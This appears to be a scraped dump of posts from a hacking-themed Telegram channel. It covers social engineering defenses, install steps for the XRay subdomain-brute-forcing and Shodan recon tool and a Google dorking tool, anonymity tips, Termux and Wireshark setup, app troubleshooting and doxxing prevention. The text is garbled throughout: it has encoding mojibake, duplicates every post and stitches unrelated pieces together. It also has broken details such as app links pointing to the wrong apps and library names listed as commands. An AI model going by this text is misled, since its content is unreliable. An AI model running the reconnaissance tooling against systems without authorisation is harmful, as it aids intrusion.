> Social engineering is the art of manipulating users of a computing system into revealing confidential information that can be used to gain unauthorized access to a computer system.
> The term can also include activities such as exploiting human kindness, greed, and curiosity to gain access to restricted access buildings or getting the users to installing backdoor software.
> Knowing the tricks used by hackers to trick users into releasing vital login information among others is fundamental in protecting computer systems
๐ฆHOW THOSE ATTACKS WORKS ?
1) Gather Information: This is the first stage, the learns as much as he can about the intended victim. The information is gathered from company websites, other publications and sometimes by talking to the users of the target system.
2)Plan Attack: The attackers outline how he/she intends to execute the attack
3) Acquire Tools: These include computer programs that an attacker will use when launching the attack.
4) Attack: Exploit the weaknesses in the target system.
Use acquired knowledge: Information gathered during the social engineering tactics such as pet names, birthdates of the organization founders, etc. is used in attacks such as password guessing.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSocial engeneer the expert hacking :Understanding before attack:
twitter.com/UNDERCODETC
๐ฆโโโฃโข โโฃโโกโฃ
> Most techniques employed by social engineers involve manipulating human biases. To counter such techniques, an organization can;
1) To counter the familiarity exploit, the users must be trained to not substitute familiarity with security measures. Even the people that they are familiar with must prove that they have the authorization to access certain areas and information.
2) To counter intimidating circumstances attacks, users must be trained to identify social engineering techniques that fish for sensitive information and politely say no.
3) To counter phishing techniques, most sites such as Yahoo use secure connections to encrypt data and prove that they are who they claim to be. Checking the URL may help you spot fake sites. Avoid responding to emails that request you to provide personal information.
4) To counter tailgating attacks, users must be trained not to let others use their security clearance to gain access to restricted areas. Each user must use their own access clearance.
5) To counter human curiosity, itโs better to submit picked up flash disks to system administrators who should scan them for viruses or other infection preferably on an isolated machine.
6) To counter techniques that exploit human greed, employees must be trained on the dangers of falling for such scams.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
๐ฆSocial engeneer the expert hacking :Understanding before attack:
twitter.com/UNDERCODETC
๐ฆโโโฃโข โโฃโโกโฃ
> Most techniques employed by social engineers involve manipulating human biases. To counter such techniques, an organization can;
1) To counter the familiarity exploit, the users must be trained to not substitute familiarity with security measures. Even the people that they are familiar with must prove that they have the authorization to access certain areas and information.
2) To counter intimidating circumstances attacks, users must be trained to identify social engineering techniques that fish for sensitive information and politely say no.
3) To counter phishing techniques, most sites such as Yahoo use secure connections to encrypt data and prove that they are who they claim to be. Checking the URL may help you spot fake sites. Avoid responding to emails that request you to provide personal information.
4) To counter tailgating attacks, users must be trained not to let others use their security clearance to gain access to restricted areas. Each user must use their own access clearance.
5) To counter human curiosity, itโs better to submit picked up flash disks to system administrators who should scan them for viruses or other infection preferably on an isolated machine.
6) To counter techniques that exploit human greed, employees must be trained on the dangers of falling for such scams.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
๐ฆXRay is a tool for recon, mapping and OSINT gathering from public networks.
t.me/iOsDeveloppers
๐ฆFEATURS :
1) It'll bruteforce subdomains using a wordlist and DNS requests.
For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
2) If a ViewDNS API key is provided, for every subdomain historical data will be collected.
3) For every unique ip address, and for every open port, it'll launch specific banner grabbers and info collectors.
4) Eventually the data is presented to the user on the web ui.
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
Building a Docker image
To build a Docker image with the latest version of XRay:
1) git clone https://github.com/evilsocket/xray.git
2) cd xray
3) docker build -t xraydocker .
4) Once built, XRay can be started within a Docker container using the following:
>docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com
>Manual Compilation
Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.
5) Then:
> go get github.com/evilsocket/xray
> cd $GOPATH/src/github.com/evilsocket/xray/
> make
You'll find the executable in the build folder.
๐ฆTested by UndercOde on:
> debian
E N J O Y
@UndercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
๐ฆXRay is a tool for recon, mapping and OSINT gathering from public networks.
t.me/iOsDeveloppers
๐ฆFEATURS :
1) It'll bruteforce subdomains using a wordlist and DNS requests.
For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
2) If a ViewDNS API key is provided, for every subdomain historical data will be collected.
3) For every unique ip address, and for every open port, it'll launch specific banner grabbers and info collectors.
4) Eventually the data is presented to the user on the web ui.
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
Building a Docker image
To build a Docker image with the latest version of XRay:
1) git clone https://github.com/evilsocket/xray.git
2) cd xray
3) docker build -t xraydocker .
4) Once built, XRay can be started within a Docker container using the following:
>docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com
>Manual Compilation
Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.
5) Then:
> go get github.com/evilsocket/xray
> cd $GOPATH/src/github.com/evilsocket/xray/
> make
You'll find the executable in the build folder.
๐ฆTested by UndercOde on:
> debian
E N J O Y
@UndercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โโ
๐ฆCommand line go0gle dorking tool
t.me/UndercOdeTesting
๐ฆFeatures :
> GooDork allows you to apply regular expressions to any and all of the follow attributes of web applications
*URL
*displayable Text
*anchors
Many more options will shortly be made available
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/k3170makan/GooDork
2) GooDork
3) COMMANDS:
> python beautifulsoup4
>python-httplib
comprehensive HTTP client library
> python-urllib
> python-urlparse
@UndercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
๐ฆCommand line go0gle dorking tool
t.me/UndercOdeTesting
๐ฆFeatures :
> GooDork allows you to apply regular expressions to any and all of the follow attributes of web applications
*URL
*displayable Text
*anchors
Many more options will shortly be made available
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/k3170makan/GooDork
2) GooDork
3) COMMANDS:
> python beautifulsoup4
>python-httplib
comprehensive HTTP client library
> python-urllib
> python-urlparse
@UndercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow TO BROWSING TOTALLY ANONYMOUSLY 2019-2020:
instagram.com/UnderCodeTestingCompany :
๐ฆโโโฃโข โโฃโโกโฃ
1) HTTPS Everywhere
> HyperText Transfer Protocol which is used to exchange data between browsers and websites
2) Beware of Public (Unprotected) Wi-Fi
3) Beware of Browser Plugins
4) DuckDuckGo
5) Beware of Cookies
>Cookies can be used to perform several complex tasks including keeping your login credentials, card details, location and language preferences, etc. so it is important that you keep track of which cookies your browser stores and how they will be used
6) TOR browser
7) Use a trusted provider VPN
8) Use an Anonymous Email Account
9) Use Mobile Network
Browsing using your phoneโs data is a secure way to remain anonymous online because it uses a routing system which assigns a unique IP address each time you connect to it
10) Anonymous Digital Payments
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow TO BROWSING TOTALLY ANONYMOUSLY 2019-2020:
instagram.com/UnderCodeTestingCompany :
๐ฆโโโฃโข โโฃโโกโฃ
1) HTTPS Everywhere
> HyperText Transfer Protocol which is used to exchange data between browsers and websites
2) Beware of Public (Unprotected) Wi-Fi
3) Beware of Browser Plugins
4) DuckDuckGo
5) Beware of Cookies
>Cookies can be used to perform several complex tasks including keeping your login credentials, card details, location and language preferences, etc. so it is important that you keep track of which cookies your browser stores and how they will be used
6) TOR browser
7) Use a trusted provider VPN
8) Use an Anonymous Email Account
9) Use Mobile Network
Browsing using your phoneโs data is a secure way to remain anonymous online because it uses a routing system which assigns a unique IP address each time you connect to it
10) Anonymous Digital Payments
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTERMUX PACKAGES 2019-2020:
instagram.com/UnderCodeTestingCompany
๐ฆโโโฃโข โโฃโโกโฃ
> x11-repo :Termux repo for x11 packages pkg install x11-repo
>vnc server :For graphical output pkg install tigervnc
>openbox wm :Openbox Window Managerpkg install openbox obconf
>xsetroot :Set color background for X pkg install xorg-xsetroot
>xterm X terminal pkg install xterm
>xcompmgr Composite manager or desktop effects pkg install xcompmgr
> xfsettingsd The settings daemon, to set themes & icons pkg install xfce4-settings
> polybar Easy and fast status bar pkg install polybar
>st Suckless/Simple terminal pkg install st
>geany Graphical text editor pkg install geany
>thunar File manager (optional) pkg install thunar
>pcmanfm File manager pkg install pcmanfm
>rofi An application launcher pkg install rofi
>feh Simple image viewer pkg install feh
>neofetch System info program pkg install neofetch
>git VCS, for cloning repos pkg install git
>wget Command line downloader pkg install wget
>curl To transfer/get internet data pkg install curl
>zsh A very good shell pkg install zsh
>vim Command line text editor (! - hard to exit :D) pkg
>install vim
>htop System monitor (optional) pkg install htop
>elinks Command line web browser (optional) pkg install elinks
>mutt Command line mail client (optional) pkg install mutt
>mc Command line file manager (optional) pkg install mc
>ranger Command line file manager (optional) pkg install ranger
>cmus Command line music player (optional) pkg install cmus
>cava Console-based audio visualizer (optional) pkg install cava
>pulseaudio Sound system & audio server (optional) pkg install pulseaudio
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTERMUX PACKAGES 2019-2020:
instagram.com/UnderCodeTestingCompany
๐ฆโโโฃโข โโฃโโกโฃ
> x11-repo :Termux repo for x11 packages pkg install x11-repo
>vnc server :For graphical output pkg install tigervnc
>openbox wm :Openbox Window Managerpkg install openbox obconf
>xsetroot :Set color background for X pkg install xorg-xsetroot
>xterm X terminal pkg install xterm
>xcompmgr Composite manager or desktop effects pkg install xcompmgr
> xfsettingsd The settings daemon, to set themes & icons pkg install xfce4-settings
> polybar Easy and fast status bar pkg install polybar
>st Suckless/Simple terminal pkg install st
>geany Graphical text editor pkg install geany
>thunar File manager (optional) pkg install thunar
>pcmanfm File manager pkg install pcmanfm
>rofi An application launcher pkg install rofi
>feh Simple image viewer pkg install feh
>neofetch System info program pkg install neofetch
>git VCS, for cloning repos pkg install git
>wget Command line downloader pkg install wget
>curl To transfer/get internet data pkg install curl
>zsh A very good shell pkg install zsh
>vim Command line text editor (! - hard to exit :D) pkg
>install vim
>htop System monitor (optional) pkg install htop
>elinks Command line web browser (optional) pkg install elinks
>mutt Command line mail client (optional) pkg install mutt
>mc Command line file manager (optional) pkg install mc
>ranger Command line file manager (optional) pkg install ranger
>cmus Command line music player (optional) pkg install cmus
>cava Console-based audio visualizer (optional) pkg install cava
>pulseaudio Sound system & audio server (optional) pkg install pulseaudio
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBESTt ANDROID apps for video editing 2020:
t.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
1) FilmoraGo
>https://play.google.com/store/apps/details?id=com.wondershare.filmorago
2) Adobe Premiere Club
>https://play.google.com/store/apps/details?id=com.adobe.premiereclip
3) VideoShow
>https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
4) PowerDirector
>https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
5) KineMaster
>https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
6) Quik
>https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
7) VivaVideo
>https://play.google.com/store/apps/details?id=com.avcrbt.funimate
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBESTt ANDROID apps for video editing 2020:
t.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
1) FilmoraGo
>https://play.google.com/store/apps/details?id=com.wondershare.filmorago
2) Adobe Premiere Club
>https://play.google.com/store/apps/details?id=com.adobe.premiereclip
3) VideoShow
>https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
4) PowerDirector
>https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
5) KineMaster
>https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
6) Quik
>https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
7) VivaVideo
>https://play.google.com/store/apps/details?id=com.avcrbt.funimate
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWHY WIRESHARK MUST BE INSTALLED ON ANY LINUX & HOW ?
twitter.com/UNDERCODETC
๐ฆFEATURES :
1) Deep inspection of hundreds of protocols, with more being added all the time
2) Live capture and offline analysis
3) Standard three-pane packet browser
4) Multi-platform: Runs on Windows, Linux, macOS, Solaris, FreeBSD, NetBSD, and many others
5) Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
6) The most powerful display filters in the industry
7) Rich VoIP analysis
8) Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network
9) Monitor, Network General Snifferยฎ (compressed and uncompressed), Snifferยฎ Pro, and NetXrayยฎ, Network Instruments
10) Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN
11) Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
12) Capture files compressed with gzip can be decompressed on the fly
13) Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
14) Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
15) Coloring rules can be applied to the packet list for quick, intuitive analysis
16) Output can be exported to XML, PostScriptยฎ, CSV, or plain textInsta
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
$ sudo apt-get update
$ sudo apt-get install wireshark -y
@UndercOdeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
๐ฆWHY WIRESHARK MUST BE INSTALLED ON ANY LINUX & HOW ?
twitter.com/UNDERCODETC
๐ฆFEATURES :
1) Deep inspection of hundreds of protocols, with more being added all the time
2) Live capture and offline analysis
3) Standard three-pane packet browser
4) Multi-platform: Runs on Windows, Linux, macOS, Solaris, FreeBSD, NetBSD, and many others
5) Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
6) The most powerful display filters in the industry
7) Rich VoIP analysis
8) Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network
9) Monitor, Network General Snifferยฎ (compressed and uncompressed), Snifferยฎ Pro, and NetXrayยฎ, Network Instruments
10) Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN
11) Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
12) Capture files compressed with gzip can be decompressed on the fly
13) Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
14) Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
15) Coloring rules can be applied to the packet list for quick, intuitive analysis
16) Output can be exported to XML, PostScriptยฎ, CSV, or plain textInsta
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
$ sudo apt-get update
$ sudo apt-get install wireshark -y
@UndercOdeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWays to Fix Any App like Instagram Not Working, Loading, or Crashing Issue
t.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
1) App Permission
Go back to where you deleted cache, and you will see App permissions. Tap on it once to make sure that services that you want to use with Instagram app is given necessary permissions.
2) Network or Data Issue
Have you checked your data plan? Maybe you ran out of data? Connect to a Wi-Fi network to check and confirm if Instagram is loading or not. Itโs also possible that there is a network issue. Ask a friend on a different network and see if he/she can access Instagram.
3) Delete Cache and Data
Old data and cache files can mess up how an app works and behaves. Deleting these files wonโt have any effect. You will have to sign back in. Open Settings and tap on Manage apps and search and open Instagram.
4) Antivirus
The steps will depend on the antivirus app that you are using, but here is the basic premise. First, disable antivirus to check if it resolves the Instagram error. If yes, some setting in your antivirus is blocking or messing with the app. If nothing happens, move on to the next point. Maybe Instagram is not whitelisted, blocked, or given necessary permissions. Go through the antivirus app to make sure everything is in order.
5) Instagram Is Down
I have noticed a few instances of the Instagram being down in the news lately. One easy and quick way to check if Instagram is working or not is to use Down Detector
6) Try the Web
Open your favorite browser on a computer or smartphone, and check if Instagram is loading or not on it. If it is working fine, you can use it from there temporarily.
7) Reinstall Instagram
Most apps release bugs fixes regularly, and Instagram is no different. Open Play Store and click on Menu to select My apps & games.
8) Update OS
Well, Android is not exactly popular for receiving OS updates on time. Except when you are using a customized OS like OxygenOS or maybe MIUI where updates are pushed and available as soon as possible.
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWays to Fix Any App like Instagram Not Working, Loading, or Crashing Issue
t.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
1) App Permission
Go back to where you deleted cache, and you will see App permissions. Tap on it once to make sure that services that you want to use with Instagram app is given necessary permissions.
2) Network or Data Issue
Have you checked your data plan? Maybe you ran out of data? Connect to a Wi-Fi network to check and confirm if Instagram is loading or not. Itโs also possible that there is a network issue. Ask a friend on a different network and see if he/she can access Instagram.
3) Delete Cache and Data
Old data and cache files can mess up how an app works and behaves. Deleting these files wonโt have any effect. You will have to sign back in. Open Settings and tap on Manage apps and search and open Instagram.
4) Antivirus
The steps will depend on the antivirus app that you are using, but here is the basic premise. First, disable antivirus to check if it resolves the Instagram error. If yes, some setting in your antivirus is blocking or messing with the app. If nothing happens, move on to the next point. Maybe Instagram is not whitelisted, blocked, or given necessary permissions. Go through the antivirus app to make sure everything is in order.
5) Instagram Is Down
I have noticed a few instances of the Instagram being down in the news lately. One easy and quick way to check if Instagram is working or not is to use Down Detector
6) Try the Web
Open your favorite browser on a computer or smartphone, and check if Instagram is loading or not on it. If it is working fine, you can use it from there temporarily.
7) Reinstall Instagram
Most apps release bugs fixes regularly, and Instagram is no different. Open Play Store and click on Menu to select My apps & games.
8) Update OS
Well, Android is not exactly popular for receiving OS updates on time. Except when you are using a customized OS like OxygenOS or maybe MIUI where updates are pushed and available as soon as possible.
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆDC/OS CLI Tunnel Subcommand
A DC/OS CLI subcommand that provides SOCKS proxy, HTTP proxy, and VPN access to your DC/OS cluster.
facebook.com/UndercOdeTestingCompanie
๐ฆโโโฃโข โโฃโโกโฃ
1) git clone git@github.com:dcos/dcos-tunnel.git
2) cd dcos-tunnel
3) Create a virtualenv for the project:
> make env
4) Try it out with:
./env/bin/dcos-tunnel
5) The VPN container lives at https://github.com/dcos/dcos-cli-vpn
6) Binary
> make binary
7) Run it with:
./dist/dcos-tunnel
8) Syntax check:
>make test
9) Syntax check + Integration test:
> sudo make test-binary
10) Single Integration test:
> sudo make test-binary-debug test=<test_name>
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆDC/OS CLI Tunnel Subcommand
A DC/OS CLI subcommand that provides SOCKS proxy, HTTP proxy, and VPN access to your DC/OS cluster.
facebook.com/UndercOdeTestingCompanie
๐ฆโโโฃโข โโฃโโกโฃ
1) git clone git@github.com:dcos/dcos-tunnel.git
2) cd dcos-tunnel
3) Create a virtualenv for the project:
> make env
4) Try it out with:
./env/bin/dcos-tunnel
5) The VPN container lives at https://github.com/dcos/dcos-cli-vpn
6) Binary
> make binary
7) Run it with:
./dist/dcos-tunnel
8) Syntax check:
>make test
9) Syntax check + Integration test:
> sudo make test-binary
10) Single Integration test:
> sudo make test-binary-debug test=<test_name>
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Avoid Dox Attack ?
>Doxxing is searching for and publishing personal information about a person publicly with malicious intent. Doxxing includes the hacker analyzing information posted online about the victim in order to identify and then harass the victim. It can also involve exposing an anonymous account to reveal the person's identity.
t.me/iOsDeveloppers
๐ฆโโโฃโข โโฃโโกโฃ
1) Vary Usernames and Passwords
Try to set unique usernames for each website you are signed up with. If you are signed up for a controversial website or forum, make sure your username is anonymous and cannot be traced back to you
2) Use Secure Passwords
Always use complex passwords, as they are more difficult to hack. Your password should be at least 12 characters with a mixture of upper and lower case letters, numbers, and other special keyboard characters.
3) Protect your Computer
Keep your system up to date and secure. Use an internet security or antivirus program to stay safe from malware, ransomware, and other threats. Make sure your security software checks for updates and installs them automatically. Furthermore, scan your system regularly, as this will alert you of any suspicious or malicious activity.
4) Protect Internet Communications
by using any trusted vpn provider
5) Social Privacy Settings
Social media plays a vital role in our daily lives. Millions of people spend their time, and often communicate with strangers, on multiple social media platforms and groups. These strangers could be a group of hackers with malicious doxxing intentions
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Avoid Dox Attack ?
>Doxxing is searching for and publishing personal information about a person publicly with malicious intent. Doxxing includes the hacker analyzing information posted online about the victim in order to identify and then harass the victim. It can also involve exposing an anonymous account to reveal the person's identity.
t.me/iOsDeveloppers
๐ฆโโโฃโข โโฃโโกโฃ
1) Vary Usernames and Passwords
Try to set unique usernames for each website you are signed up with. If you are signed up for a controversial website or forum, make sure your username is anonymous and cannot be traced back to you
2) Use Secure Passwords
Always use complex passwords, as they are more difficult to hack. Your password should be at least 12 characters with a mixture of upper and lower case letters, numbers, and other special keyboard characters.
3) Protect your Computer
Keep your system up to date and secure. Use an internet security or antivirus program to stay safe from malware, ransomware, and other threats. Make sure your security software checks for updates and installs them automatically. Furthermore, scan your system regularly, as this will alert you of any suspicious or malicious activity.
4) Protect Internet Communications
by using any trusted vpn provider
5) Social Privacy Settings
Social media plays a vital role in our daily lives. Millions of people spend their time, and often communicate with strangers, on multiple social media platforms and groups. These strangers could be a group of hackers with malicious doxxing intentions
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS